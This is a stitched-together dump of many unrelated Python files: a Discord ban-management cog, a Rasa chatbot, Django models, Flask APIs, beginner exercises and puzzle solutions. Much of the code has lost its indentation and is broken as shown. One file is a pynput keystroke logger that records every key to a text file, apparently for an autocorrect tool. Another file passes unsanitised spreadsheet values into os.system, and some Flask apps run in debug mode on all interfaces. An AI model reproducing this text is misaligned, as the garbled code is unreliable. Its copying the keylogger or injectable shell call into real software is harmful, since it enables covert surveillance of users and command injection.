@commands.command(aliases=["ujb"])
@is_admin()
async def unjobban(self, ctx, user_id: UserID, *jobs: Job):
"""
Add job unbans to queue
        Unbans are only applied after the server restarts
"""
if not jobs:
return await ctx.send("No jobs provided")
async with ctx.db.cursor(commit=True) as cur:
await cur.executemany(
"INSERT INTO job_unban_queue (user_id, job) VALUES (?, ?)",
[(user_id, job.id) for job in jobs],
)
await ctx.send(
f"Added `{user_id}` to job unban queue for jobs: **{', '.join(str(i) for i in jobs)}**"
)
async def fetch_ban(self, user_id, date):
async with self.bot.db.cursor() as cur:
await cur.execute(
"SELECT * FROM bans WHERE userId=? AND dateTimeOfBan=?",
(user_id, date),
)
fetched = await cur.fetchone()
if fetched is None:
return None
return BanEntry(*fetched)
async def fetch_all_users(self):
# TODO: sort by date of latest ban instead
async with self.bot.db.cursor() as cur:
await cur.execute(
"""
SELECT
userId,
userName,
SUM(minutes),
COUNT(userName)
FROM
bans
GROUP BY
userId
""",
)
return [UserEntry(*row) for row in await cur.fetchall()]
async def _bans_file_modified(self):
with open(self.bans_file) as f:
bans = json.loads(f.read())["banEntries"]
skipped = 0
new_bans = []
for obj in bans:
ban = BanEntry.from_file(obj)
if ban.expired:
skipped += 1
if await self.fetch_ban(ban.user_id, ban.date) is None:
new_bans.append(ban.to_dict())
if skipped:
print(f"skipped {skipped}/{len(bans)} bans")
if not new_bans:
return
print(f"Found {len(new_bans)} new ban(s), writing to db")
async with self.bot.db.cursor(commit=True) as cur:
await cur.executemany(
"""
INSERT INTO bans (
userId,
userName,
minutes,
dateTimeOfBan,
reason,
ipAddress,
clientId,
adminId,
adminName
) VALUES (
:userId,
:userName,
:minutes,
:dateTimeOfBan,
:reason,
:ipAddress,
:clientId,
:adminId,
:adminName
)
""",
new_bans,
)
async def _job_bans_file_modified(self):
pass
async def _watch_task(self, path, callback):
print(f"Started watching {path}")
last_modified = None
while True:
await asyncio.sleep(60)
try:
if (mtime := path.stat().st_mtime) == last_modified:
continue
last_modified = mtime
print(f"{path} update detected at {last_modified}")
await callback()
except Exception:
traceback.print_exc()
async def do_unbans(self):
async with self.bot.db.cursor(commit=True) as cur:
await cur.execute("SELECT user_id FROM unban_queue GROUP BY user_id")
user_ids = set(i[0] for i in await cur.fetchall())
if not user_ids:
return []
with open(self.bans_file) as f:
data = json.loads(f.read())
user_bans = []
for ban_entry in data["banEntries"]:
if ban_entry["userId"] not in user_ids:
user_bans.append(ban_entry)
data["banEntries"] = user_bans
# dump early to avoid exceptions and losing file contents
dumped = json.dumps(data)
with open(self.bans_file, "w") as f:
f.write(dumped)
await cur.execute("DELETE FROM unban_queue")
return [str(i) for i in user_ids]
async def do_job_unbans(self):
async with self.bot.db.cursor(commit=True) as cur:
await cur.execute(
"SELECT user_id, job FROM job_unban_queue GROUP BY user_id, job"
)
unbans = await cur.fetchall()
if not unbans:
return []
unbans_by_id = {}
for user_id, job in unbans:
if user_id in unbans_by_id:
unbans_by_id[user_id].add(job)
else:
                unbans_by_id[user_id] = {job}
with open(self.job_bans_file) as f:
data = json.loads(f.read())
user_bans = []
for ban_entry in data["jobBanEntries"]:
user_id = ban_entry["userId"]
if user_id not in unbans_by_id:
continue
job_bans = []
for job_ban_entry in ban_entry["jobBanEntry"]:
if job_ban_entry["job"] not in unbans_by_id[user_id]:
job_bans.append(job_ban_entry)
# do not add ban entry back if it has no jobs banned
if job_bans:
ban_entry["jobBanEntry"] = job_bans
user_bans.append(ban_entry)
# dump early to avoid exceptions and losing file contents
dumped = json.dumps(data)
with open(self.job_bans_file, "w") as f:
f.write(dumped)
await cur.execute("DELETE FROM job_unban_queue")
return [
f"`{user_id}`: **{', '.join(str(j) for j in jobs)}**"
for user_id, jobs in unbans_by_id.items()
]
def setup(bot):
bot.add_cog(Bans(bot))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 5 17:59:18 2020
@author: TakahiroKurokawa
"""
import sys
def py2_or_py3():
major=sys.version_info.major
if major==2:
return "Python2"
elif major==3:
return "Python3"
else:
return "Neither"
print(py2_or_py3())
# Complex conditional expression
def first_item(item):
if len(item)>0:
return item[0]
else:
return None
print(first_item(["book"]))
# Simple conditional expression
def first_item2(item):
if item:
return item[0]
else:
return None
print(first_item2([]))
x="book"
y="note"
print(x==y)
print(x!=y)
print(x is None)
print(x is not None)
items=["book","note"]
print("book" in items)
print("book" not in items)
count={"book":1,
"note":2}
print(1 in count)
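# Note: 'in' on a dict tests keys, so this prints False (1 is a value here, not a key)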
|
from urllib import parse
import urllib.request
url = 'http://172.16.1.188:8888/budget/pages/main'
wd = {'wd': '传智播客'}
pw = parse.urlencode(wd)
print(pw)
wd1 = {'wd1': '传'}
pw1 = parse.urlencode(wd1)
print(pw1)
wd2 = {'wd2': '智'}
pw2 = parse.urlencode(wd2)
print(pw2)
wd3 = {'wd3': '播'}
pw3 = parse.urlencode(wd3)
print(pw3)
wd4 = {'wd4': '客'}
pw4 = parse.urlencode(wd4)
print(pw4)
print(parse.unquote('wd=%E4%BC%A0%E6%99%BA%E6%92%AD%E5%AE%A2'))
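# urlencode percent-encodes each UTF-8 byte; unquote reverses it, so the line
# above prints the original query string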
|
# Lab assessment, problem 1
n = input("Please enter a positive integer: ")
n=int(n)
steps=[]
cnt=0
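# Greedy strategy: halve while even; when odd, add 1 if (n+1) % 4 == 0 (this
# creates more trailing zero bits to halve away), otherwise subtract 1.
# n == 3 is the one exception where subtracting is shorter: 3 -> 2 -> 1.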
while n!=1:
if n%2==0:
cnt+=1
n/=2
steps.append('^')
elif n==3:
cnt+=1
n-=1
steps.append('-')
else:
if (n+1)%4==0:
cnt+=1
n+=1
steps.append('+')
else:
cnt+=1
n-=1
steps.append('-')
print(cnt)
for step in steps:
print(step,end='') |
# -*- coding: utf-8 -*-
import csv
import random
import logging
import requests
import numpy as np
from tqdm import tqdm
from typing import Text, Dict, Any, List
import re
from rasa_sdk import Action, Tracker
from rasa_sdk.executor import CollectingDispatcher
from rasa_sdk.forms import FormAction
from rasa_sdk.events import SlotSet, UserUtteranceReverted, ConversationPaused, FollowupAction
from modules.bm25 import bm25_scoring
from modules.functions import build_keywords_list
logger = logging.getLogger(__name__)
# Declare the IR parameters in a dict
arg_dict = {}
arg_dict['max_seq_length'] = 512
arg_dict['per_gpu_eval_batch_size'] = 32
arg_dict['es_nb_max_result'] = 3
arg_dict['tolerance'] = 0.01
arg_dict['language'] = 'french'
arg_dict['device'] = 'cpu'
arg_dict['stopwords_csv'] = 'data_ir/stopwords.csv'
arg_dict['artistes_csv'] = 'data_ir/artforness_data_artistes.csv'
arg_dict['oeuvres_csv'] = 'data_ir/artforness_data_oeuvres.csv'
# Setup logging
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger.warning("Process rank: %s, device: %s, distributed training: %s, 16-bits training: %s",
-1, arg_dict['device'], bool(-1 != -1), '')
class ActionRechercher(Action):
""" Fonction custom de recherche dans la base par l'intervention de deux modèles :
- récupère l'input de l'utilisateur,
- procède à un filtrage verbes-noms par spaCy,
- requête le modèle d'Information Retrieving (IR) qui identifie les sources de réponse,
- complété par le modèle de Reranking (Reranker) qui vérifie la pertinence des sources,
- identifie les n premières propositions de réponse par un seuil de tolérance,
- renvoie le résultat de la recherche à l'utilisateur.
"""
def name(self):
return "action_rechercher"
def run(self, dispatcher, tracker, domain):
        # get the intent and the query from the last user message
        intent = tracker.latest_message['intent'].get('name')
        query = (tracker.latest_message)['text']
        # along with the value of the boolean slot "relance"
        relance = tracker.get_slot("relance")
        # check the value of the intent or of the "relance" slot
        if intent == "recherche" or relance == True:
            # query the IR model
            bm25_result = bm25_scoring(arg_dict['oeuvres_csv'], query)
            # check that the results are non-empty
            if len(bm25_result) > 0:
                # reply messages, one of which is picked at random
retour = [
"Voilà ce que j'ai trouvé :",
"Voici quelques éléments de réponse :",
"Quelques pistes de réflexion :",
"Hop ! À toi de chercher là-dedans maintenant :"
]
message = random.choice(retour)
for i in range(min(len(bm25_result), arg_dict['es_nb_max_result'])):
current_titre = bm25_result.iloc[i]['Titre'].replace('\"', '')
current_lien = bm25_result.iloc[i]['Lien'].replace('\"', '')
current_lien = re.sub('\s+', '', current_lien)
message = message + '\n* [{}]({})'.format(
current_titre,
current_lien
)
dispatcher.utter_message(message)
print('message: {}'.format(message))
# puis retourne le slot "recherche" à "reussie",
# et retourne le slot "relance" à "False"
return [
SlotSet("recherche", "reussie"),
SlotSet("relance", False),
UserUtteranceReverted()
]
            else:
                # otherwise, send a failure message
                dispatcher.utter_template("utter_recherche_echouee", tracker)
                # then set the "recherche" slot to "echouee"
                # and reset the "relance" slot to False
return [
SlotSet("recherche", "echouee"),
SlotSet("relance", False),
UserUtteranceReverted()
]
        # otherwise return an error message (a raised exception would not reach the user)
else:
return dispatcher.utter_message('Ah, j\'ai rencontré un problème système, je ne parviens pas à lancer ta recherche, essaie de la reformuler mais si le problème persiste, contacte un référent et transmet-lui le message suivant afin qu\'il me répare s\'il-te-plaît : "Erreur : intent >< \'recherche\' ET slot \'relance\' = False"')
class ActionDefaultFallback(Action):
""" Fonction custom de fallback par défaut matérialisée par l'incompréhension du chatbot :
- annule la dernière incompréhension pour ne pas impacter les prédictions futures,
- force une action de recherche par défaut.
"""
def name(self) -> Text:
return "action_incomprehension"
def run(
self,
dispatcher: CollectingDispatcher,
tracker: Tracker,
domain: Dict[Text, Any],
) -> List["Event"]:
        # tell the user we did not understand and that a default search is being launched
        dispatcher.utter_template("utter_incomprehension", tracker)
        # then set the boolean "relance" slot to True
        # and trigger the search action
return [
SlotSet("relance", True),
FollowupAction("action_rechercher"),
]
class Conversation(Action):
"""Retourne le utter correspondant à l'intent conversationnel détecté."""
def name(self):
return "action_conversation"
def run(self, dispatcher, tracker, domain):
intent = tracker.latest_message["intent"].get("name")
        # pick the conversational utterance matching the detected intent
if intent in [
"saluer",
"identite",
"insulter",
"createur",
"meteo",
"possibilites",
"isbot",
"quel_age",
"quelle_langue",
"quelle_heure",
"qui_suis_je",
"quel_nom",
"origine_lieu",
"origine_construction",
"faire_connaissance",
"faire_blague",
"quel_genre",
"merci",
"affirmer",
"infirmer",
"complimenter",
"hors_sujet"
]:
dispatcher.utter_template("utter_" + intent, tracker)
return [] |
from django.db import models
from . import models as base
from . import society
class VehicleBrand(base.BaseModel):
name = models.CharField(max_length=40, null=True, blank=False)
    is_active = models.BooleanField(default=False, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
db_table = 'vehicle_brands'
class VehicleModel(base.BaseModel):
name = models.CharField(max_length=40, null=True, blank=False)
brand = models.ForeignKey(VehicleBrand, on_delete=models.SET_NULL, null=True, blank=False)
    is_active = models.BooleanField(default=False, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
db_table = 'vehicle_models'
class PartnerVehicle(base.BaseModel):
VEHICLE_FOUR_WHEELER = "Four Wheeler"
VEHICLE_TWO_WHEELER = "Two Wheeler"
VEHICLE_OTHER = "Other"
VEHICLE_CHOICES = (
(VEHICLE_FOUR_WHEELER, "Four Wheeler"),
(VEHICLE_TWO_WHEELER, "Two Wheeler"),
(VEHICLE_OTHER, "Other"),
)
owner = models.ForeignKey(base.ResPartner, on_delete=models.SET_NULL, null=True, blank=True)
vehicle = models.CharField(choices=VEHICLE_CHOICES, max_length=20, null=True, blank=False)
brand = models.ForeignKey(VehicleBrand, on_delete=models.SET_NULL, null=True, blank=True)
registration_number = models.CharField(max_length=40, unique=True, null=True, blank=False)
society = models.ForeignKey(society.ResSociety, on_delete=models.SET_NULL, null=True, blank=False)
def __str__(self):
return self.registration_number
class Meta:
db_table = 'partner_vehicle_rel'
class VehicleParking(base.BaseModel):
name = models.CharField(max_length=40, null=True, blank=False)
parked_vehicle = models.ForeignKey(PartnerVehicle, on_delete=models.SET_NULL, null=True, blank=True)
society = models.ForeignKey(society.ResSociety, on_delete=models.SET_NULL, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
db_table = 'vehicle_parking'
|
#for loop
p = [1,2,3,4,5]
for x in p:
print(x)
q = ['apple','banana','pine apple','orange']
for m in q:
print(m)
k = ['mehedi','012458654','225413','kamrul','noyon','<->',"@"]
print(k[3])
|
from pynput.keyboard import Key, Listener
import logging
from pyautogui import typewrite, hotkey
log_dir = r"C:/users/Cameron/Desktop/1P03/LawtoCorrect/backend/"
logging.basicConfig(filename=(log_dir + "keyLog.txt"), level=logging.DEBUG, format='%(message)s')
keys = []
shifted = False
corrected = ''
def in_alphabet(key):
return 32 < ord(key) < 127
def on_release(key):
global keys, shifted, corrected
try:
if key == Key.space:
write_file(keys)
#corrected = autocorrect()
corrected = ''
if not corrected:
corrected = keys
hotkey('ctrl', 'del')
typewrite(corrected)
keys = []
return
elif key == Key.backspace:
keys.pop()
return
elif key == Key.shift:
shifted = True
return
# print(str(key).replace("'", ""))
        if shifted and in_alphabet(str(key).replace("'", "")):
            keys.append(str(key).replace("'", "").upper())
            shifted = False
        elif shifted and not in_alphabet(str(key).replace("'", "")):
            shifted = False
        elif in_alphabet(str(key).replace("'", "")):
            keys.append(str(key).replace("'", ""))
except:
pass
def write_file(keys):
with open("keyLog.txt", "a") as f:
f.write(" ")
for key in keys:
k = str(key).replace("'", "")
f.write(k)
with Listener(on_release=on_release) as listener:
listener.join()
|
#__author: "Jing Xu"
#date: 2018/1/18
# -------------------------------------------------------------------------
# def f(n):
# return n*n*n
#
# a = [ x*2 for x in range(10) ]
#
# s = ( x*2 for x in range(10) ) #generator is an iterable
# print(s) #<generator object <genexpr> at 0x000001C20702C308>
# print(next(s)) # equivalent to s.__next__() in Py2
# print(next(s))
# -------------------------------------------------------------------------
# s = ( x*2 for x in range(10) )
# for i in s: # the for statement calls next() for us
# print(i)
# -------------------------------------------------------------------------
# def foo():
# print('ok')
# yield 1
# print('ok2')
# yield 2
#
# g=foo()
# print(g)
# next(g)
# g=foo()
# next(g)
# print(g)
# next(g)
# -------------------------------------------------------------------------
# def fibo(max):
# n, before, after = 0, 0, 1
# while n < max:
# yield before
# before, after = after, before+after
# n += 1
#
# for i in fibo(10):
# print(i)
# -------------------------------------------------------------------------
# # Iterables (an object with an __iter__ method is called iterable)
# l = [1,2,3]
# l.__iter__()
# t = (1,2,3)
# t.__iter__()
# d={'name':'123'}
# d.__iter__()
# -------------------------------------------------------------------------
# def bar():
# print('ok1')
# count = yield 1
# print(count)
# print('ok2')
# count1 = yield 2
# print(count1)
# print('ok3')
# yield 3
#
# b=bar()
# next(b)
# b.send('eee')
# b.send('fff')
# -------------------------------------------------------------------------
# import time
#
# def consumer(name):
# print("%s 准备吃包子" %name)
# while True:
# baozi = yield
# print("包子[%s]来了,被[%s]吃了" %(baozi,name))
#
# def producer(name):
# c = consumer('A')
# c2 = consumer('B')
# c.__next__()
# c2.__next__()
# print("%s准备做包子" %name)
# for i in range(1,19,2):
# time.sleep(1)
# print("做了2个包子")
# c.send(i)
# c2.send(i+1)
#
# producer("alex")
# -------------------------------------------------------------------------
# # All generators are iterators, but not every iterator is a generator
# # list, tuple, dict, string: Iterable
# l = [1,2,3,4,5]
# d = iter(l)
# print(d)
# # An iterator satisfies two conditions (the iterator protocol): 1. it has __iter__ 2. it has __next__
# # A for loop does three things internally: 1. call iter() on the iterable to get an iterator 2. repeatedly call the iterator's next 3. handle StopIteration
# -------------------------------------------------------------------------
# from collections.abc import Iterator, Iterable
#
# l = [1,2,3,4,5]
# d = iter(l)
# print(isinstance(l,list))
# print(isinstance(l,Iterator))
# print(isinstance(l,Iterable))
# print(isinstance(d,Iterator))
# -------------------------------------------------------------------------
print(max(len(x.strip()) for x in open("Help_on_builtin_module_time","r",encoding="utf8"))) |
input_file = 'Day 20\\Input.csv'
text_file = open(input_file)
lines = text_file.read().split('\n')
ips = []
for line in lines:
ip = []
lower = int(line.split('-')[0])
upper = int(line.split('-')[1])
ip.append(lower)
ip.append(upper)
ips.append(ip)
ip_list = sorted(ips)
def min_ip(ips):
    ip = 0
    i = 0
    while ip < 2**32:
        lower = ips[i][0]
        upper = ips[i][1]
        if ip < lower:
            # ip sits below the next blocked range, so it is the lowest allowed IP
            return ip
        else:
            # ranges can overlap, so never move the candidate backwards
            ip = max(ip, upper + 1)
            i += 1
def check_ip(i, ips):
for lower, upper in ips:
if lower <= i <= upper:
break
else:
if i < 2**32:
return True
return False
def count_ips(ips):
total = 0
poss = [ip[1] + 1 for ip in ips]
good = [i for i in poss if check_ip(i, ips)]
for ip in good:
while check_ip(ip, ips):
total += 1
ip += 1
return total
print("Part 1: " + str(min_ip(ip_list))) # Correct!
print("Part 2: " + str(count_ips(ip_list))) # Correct! |
from flask import Flask,request
import pandas as pd
import numpy as np
import pickle
from flasgger import Swagger
app=Flask(__name__)
Swagger(app)
with open('bank_note_base.pkl', 'rb') as pkl_file:
    classifier = pickle.load(pkl_file)
@app.route('/')
def base():
return "Base path or welcome page"
@app.route('/authenticate')
def authenticate_note():
    variance = request.args.get('variance')
    skewness = request.args.get('skewness')
    curtosis = request.args.get('curtosis')
    entropy = request.args.get('entropy')
    # test = pd.read_csv(request.files.get("file"))
    # query args arrive as strings, so cast to float before predicting
    return f"""My predicted value is {classifier.predict([[float(variance), float(skewness), float(curtosis), float(entropy)]])}"""
if __name__ == '__main__':
app.run(host='0.0.0.0',port=8000)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 1 21:42:46 2020
@author: enix3
"""
import torch
import torch.nn as nn
# For DIV2K
class MeanShift(nn.Conv2d):
def __init__(
self, rgb_range,
rgb_mean=(0.4488, 0.4371, 0.4040), rgb_std=(1.0, 1.0, 1.0), sign=-1):
super(MeanShift, self).__init__(3, 3, kernel_size=1)
std = torch.Tensor(rgb_std)
self.weight.data = torch.eye(3).view(3, 3, 1, 1) / std.view(3, 1, 1, 1)
self.bias.data = sign * rgb_range * torch.Tensor(rgb_mean) / std
for p in self.parameters():
p.requires_grad = False
def conv_flops(inputs, outputs, kernel_size):
_, c_in, h_in, w_in = inputs.size()
_, c_out, h_out, w_out = outputs.size()
    return kernel_size*kernel_size*c_in*c_out*h_out*w_out
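# Quick illustrative check (an addition, not part of the original script):
# FLOPs of a single 3x3 conv on a 1x3x32x32 input.
if __name__ == '__main__':
    conv = nn.Conv2d(3, 16, kernel_size=3, padding=1)
    x = torch.randn(1, 3, 32, 32)
    print(conv_flops(x, conv(x), 3))  # 3*3 * 3 * 16 * 32*32 = 442368
|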
import json
def getJsonFromFile(filename):
with open('data/{}'.format(filename), 'r') as jsonFile:
return json.load(jsonFile)
def getJsonObjectById(obj, id):
    for item in obj:  # 'item' avoids shadowing the built-in dict
        if item['id'] == id:
            return item
|
# -*- coding: utf-8 -*-
"""
@author: Duy Anh Philippe Pham
@date: 26/07/21
@version: 1.00
@Recommandation: Python 3.7
@Purpose: Study of density
"""
import numpy as np
import sys
sys.path.insert(1,'../../libs')
import matplotlib.pylab as plt
import tools, display, barycenter, process
def triangle_sup(mask,n):
    # upper triangle of size n (along the x axis); mask for a square matrix
for i in range(0,n):#vertical
for j in range(0,n):#horizontal
if i+j<n:
mask[i,j]=1
return mask
def triangle_inf(mask,n):
    # lower triangle of size n (along the x axis); mask for a square matrix
for i in range(n,np.shape(mask)[0]):#vertical
for j in range(n,np.shape(mask)[1]):#horizontal
if (j+i-np.shape(mask)[0])>n:
mask[i,j]=1
return mask
# Directory
hemi='L'
source='../../data/'+hemi+'/'
source1='../../variables/'
chemin=source1+'DBSCAN/'
# Load data
barycentre=np.load(source1+"barycentre/"+hemi+'/99.npy')
fenetre=31
Lglissant=np.load(source1+'isomap/'+hemi+'/barycentre glissant/bary_glissant_'+str(fenetre)+'_'+hemi+'.npy')
# Barycenter
X=barycentre
_,_,img_xs=tools.estimate_pseudo_density(X)
img_xs=img_xs/np.sum(img_xs)
image = img_xs  # alternative: (img_xs > np.percentile(img_xs, 90)) * img_xs
if False:  # marginal-law study to determine the 4 zones
display.show_map(image, hemi+' - test')
postcentral=np.sum(image,axis=1)
precentral=np.sum(image,axis=0)
plt.figure()
#plt.scatter(list(range(0,len(precentral))),precentral,marker='*',label='Precentral')
plt.scatter(list(range(0,len(postcentral))),postcentral,marker='+',label='Postcentral')
plt.legend()
#plt.title("Marginal laws")
plt.ylim(0,np.max([precentral,postcentral])*1.1)
plt.show()
mask1=triangle_sup(np.zeros(np.shape(image)) ,40)
mask4=triangle_inf(np.zeros(np.shape(image)) ,65)
mask2=triangle_sup(np.zeros(np.shape(image)) ,100)-mask1
mask3=triangle_inf(np.zeros(np.shape(image)) ,0)-mask4
if False:  # display the masks
display.show_map(mask1,'mask1')
display.show_map(mask2,'mask2')
display.show_map(mask3,'mask3')
display.show_map(mask4,'mask4')
if True:  # density study
Larea1=[]
Larea2=[]
Larea3=[]
Larea4=[]
for X in Lglissant:
_,_,img_xs=tools.estimate_pseudo_density(X)
img_xs=img_xs/np.sum(img_xs)
Larea1.append(np.sum(img_xs*mask1))
Larea2.append(np.sum(img_xs*mask2))
Larea3.append(np.sum(img_xs*mask3))
Larea4.append(np.sum(img_xs*mask4))
if True:  # plot the tracking figures
plt.figure()
plt.scatter(list(range(0,len(Larea1))),Larea1,label='area 1 - ventral',marker='+')
plt.scatter(list(range(0,len(Larea1))),Larea2,label='area 2 - ventral',marker='+')
plt.scatter(list(range(0,len(Larea1))),Larea3,label='area 3 - dorsal',marker='*')
plt.scatter(list(range(0,len(Larea1))),Larea4,label='area 4 - dorsal',marker='*')
plt.legend()
plt.title(hemi+" - Density tracking")
plt.ylim(0,np.max([Larea1,Larea2,Larea3,Larea4])*1.1)
plt.show() |
N, W = map( int, input().split())
WV = [ list( map( int, input().split())) for _ in range(N)]
dp = [0]*(W+1)
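# 0/1 knapsack: scan capacities from high to low so each item is used at most
# once (scanning low to high would allow unlimited reuse of the same item)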
for i in range(N):
    w, v = WV[i]
    for j in range(W, -1, -1):  # 'j' avoids shadowing the outer loop index
        if j >= w:
            dp[j] = max(dp[j], dp[j-w] + v)
        else:
            break
print( dp[-1])
|
#Function to check if two strings are rotations of one another
def isRotation(string1, string2):
    # string2 is a rotation of string1 iff both have equal length
    # and string2 occurs inside string1 + string1
    if len(string1) != len(string2):
        return False
    double = string1 + string1
    return string2 in double
print("terwa is rotation of water? ")
print(isRotation("water", "terwa"))
print("terwas is rotation of water? ")
print(isRotation("water", "terwas"))
|
from lib import Math
m = Math()
n1 = 2
n2 = 3
result = m.sumIntegers(n1,n2)
print ("The result of " + str(n1) + " + " + str(n2) + " is: " + str(result)) |
#NOTE: this is in Python 2, not Python 3
import csv
test_list1 = []
class HeartRate:
def __init__(self, filename='filename.csv'):
### Sean:
### csv.reader() is a better solution, but I'll do this quickly
### Feel free to fix / improve.
dataFromFile = open(filename).readlines()
dataKeys = dataFromFile[0].strip().split(',')
dataValues = dataFromFile[1].strip().split(',')
polarPairs = {key:dataValues[i] for i,key in enumerate(dataKeys)}
print "Calories burned = ", polarPairs['Calories']
self.heartrate = []
### Sean:
### Now, get the heartrate list from the file.
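        ### Illustrative DictReader variant of the parsing above (a sketch,
        ### not wired in):
        ###     with open(filename) as f:
        ###         polarPairs = next(csv.DictReader(f))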
    def averageHeartRate(self):
        ### returns a float to two decimals of the average heart rate during
        ### the effort
        ### how does it compare to the Polar calculated value
        pass
    def maxHeartRate(self):
        ### returns a float to two decimals of the maximum heart rate during
        ### the effort
        ### how does it compare to the Polar calculated value
        pass
    def minHeartRate(self):
        ### returns a float to two decimals of the minimum heart rate during
        ### the effort
        ### how does it compare to the Polar calculated value
        pass
    def caloriesBurned(self, gender='female'):
        ### returns the number of calories burned during the effort
        ### here is a simple formula:
        ### Male: Calories/min = (-55.0969 + (0.6309 * Heart Rate) + (0.1988 * Weight) + (0.2017 * Age)) / 4.184
        ### Female: Calories/min = (-20.4022 + (0.4472 * Heart Rate) - (0.1263 * Weight) + (0.074 * Age)) / 4.184
        ### how does it compare to the Polar calculated value
        pass
test_list2 = HeartRate(filename='RayHao_Speedwalking.csv')
|
import sys
import os
import xlrd
numlines = int(sys.argv[1])
loc = ("datadictionary.xlsx")
wb = xlrd.open_workbook(loc)
sheet = wb.sheet_by_index(0)
for index in range(2, sheet.nrows):
row = sheet.row_values(index)
if row[0] != '':
os.system("generate.py "+row[0]+" "+str(numlines)+" scripts/"+row[0]+".txt")
|
from django.conf import settings
from portia_api.jsonapi import JSONResponse
def capabilities(request):
capabilities = {
'custom': settings.CUSTOM,
'username': request.user.username,
'capabilities': settings.CAPABILITIES,
}
return JSONResponse(capabilities)
|
class Solution:
def fourSum(self, nums, target):
resList = []
if len(nums)<4:
return resList
nums.sort()
length = len(nums)
# i j k h
for i in range(length-3):
if i>0 and nums[i]==nums[i-1]:
continue
            # compute the smallest and largest achievable sums; skip early when target is unreachable
minAdd = nums[i]+nums[i+1]+nums[i+2]+nums[i+3]
if minAdd >target:
break
maxAdd = nums[i]+nums[length-1]+nums[length-2]+nums[length-3]
if maxAdd<target:
continue
for j in range(i+1,length-2):
if j>i+1 and nums[j]==nums[j-1]:
continue
minAdd = nums[i]+nums[j]+nums[j+1]+nums[j+2]
if minAdd >target:
continue
maxAdd = nums[i]+nums[j]+nums[length-1]+nums[length-2]
if maxAdd<target:
continue
k = j+1
h = length -1
while k<h:
add = nums[i]+nums[j]+nums[k]+nums[h]
if add==target:
d = []
d.append(nums[i])
d.append(nums[j])
d.append(nums[k])
d.append(nums[h])
resList.append(d)
h-=1
                        # h was just decremented; while the value repeats, keep decrementing
while k<h and nums[h]==nums[h+1]:
h-=1
k+=1
while k<h and nums[k]==nums[k-1]:
k+=1
continue
if add>target:
h-=1
continue
if add<target:
k+=1
continue
return resList
s = Solution()
f = s.fourSum([-1,0,-5,-2,-2,-4,0,1,-2],-9)
print(f) |
from scrapy.item import Item, Field
class Blog(Item):
    text = Field()
    time = Field()
    image_urls = Field()
    images = Field()
    image_paths = Field()
|
#!/usr/bin/python
from flask import Flask
from flask_restplus import Api, Resource, reqparse
from werkzeug.datastructures import FileStorage
from cStringIO import StringIO
from utils.linda import *
from manager.upload import library, model
from manager.run import prepare_instance, execute_workflow
from manager.csar import parse_csar
import os
import time
app = Flask(__name__)
app.config.from_object(__name__)
api = Api(app)
@api.route('/library')
class Library(Resource):
def get(self):
nt_names = linda_rd('node_type_names')
if nt_names is None:
nt_names = []
rt_names = linda_rd('relationship_type_names')
if rt_names is None:
rt_names = []
return {'node_names': nt_names, 'relationship_names': rt_names }
def put_into_s3(self):
parse = reqparse.RequestParser()
parse.add_argument('file', type=FileStorage, location='files', required=True)
args = parse.parse_args()
toscafile = args['file']
imageFile = StringIO()
toscafile.save(imageFile)
        key_name = '{0}.{1}'.format('toscatypes', 'yaml')
        content_type = 'application/x-yaml'
        bucket_name = 'mon_appli'
        file_url = upload_s3(imageFile, key_name, content_type, bucket_name)
#library(filename)
return { 'file_url': file_url }
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('file', type=FileStorage, location='files', required=True)
args = parse.parse_args()
toscafile = args['file']
storedFile = '/tmp/{}.{}'.format(time.time(),toscafile.filename)
toscafile.save(storedFile)
library(storedFile)
return self.get()
@api.route('/model')
class ToscaModel(Resource):
def get(self):
model_names = linda_rd('Model')
if model_names is None:
model_names = []
return { 'model_names': model_names }
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('file', type=FileStorage, location='files', required=True, help="Model have to be valid TOSCA file")
parse.add_argument('name', required=True, help="Model name can not be blank")
args = parse.parse_args()
modelfile = args['file']
modelname = args['name']
storedFile = '/tmp/{}.{}.yaml'.format(time.time(),modelfile.filename)
modelfile.save(storedFile)
model(storedFile, modelname)
return self.get()
@api.route('/instance')
class Instance(Resource):
def get(self):
parse = reqparse.RequestParser()
parse.add_argument('model', required=True, help="Model name can not be blank")
args = parse.parse_args()
model_name = args['model']
instance_names = linda_rd('Instance/{}'.format(model_name))
if instance_names is None:
instance_names = []
return { 'model_name': model_name, 'instance_names': instance_names }
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('model', required=True, help="Model name can not be blank")
parse.add_argument('name', required=True, help="Instance name can not be blank")
args = parse.parse_args()
model_name = args['model']
instance_name = args['name']
prepare_instance(model_name, instance_name)
return self.get()
@api.route('/exec')
class ExecWorkflow(Resource):
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('workflow', required=True, help="Workflow name can not be blank")
parse.add_argument('model', required=True, help="Model name can not be blank")
parse.add_argument('instance', required=True, help="Instance name can not be blank")
args = parse.parse_args()
workflow_name = args['workflow']
model_name = args['model']
instance_name = args['instance']
execute_workflow(workflow_name, model_name, instance_name)
return True
@api.route('/csar')
class CSAR(Resource):
def put(self):
parse = reqparse.RequestParser()
parse.add_argument('file', type=FileStorage, location='files', required=True, help="The file must be a valid CSAR archive")
parse.add_argument('model', required=True, help="Model name can not be blank")
args = parse.parse_args()
csarfile = args['file']
model_name = args['model']
stored_file = '/tmp/{}.{}'.format(time.time(),csarfile.filename)
csarfile.save(stored_file)
parse_csar(stored_file, model_name)
return True
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
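# Example interaction (illustrative file name; Flask serves on port 5000 by default):
#   curl -X PUT -F file=@types.yaml http://localhost:5000/library
#   curl http://localhost:5000/library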
|
import numpy as np
def parse_file(filename):
""" Parse files structured in the same way as demos are """
with open(filename) as f:
points = []
for line in f.readlines():
points += [[int(_) for _ in point.strip('()').split(',')] for point in line.split()]
return np.array(points)
def rescale_old(points, new_min=0.1, new_max=1):
""" Rescale each axis to be within the specified range """
if len(points) == 1:
return np.full_like(points, new_max)
pmin = points.min(axis=0)
pmax = points.max(axis=0)
return (points - pmin) / (pmax - pmin) * (new_max - new_min) + new_min
def rescale(points):
"""
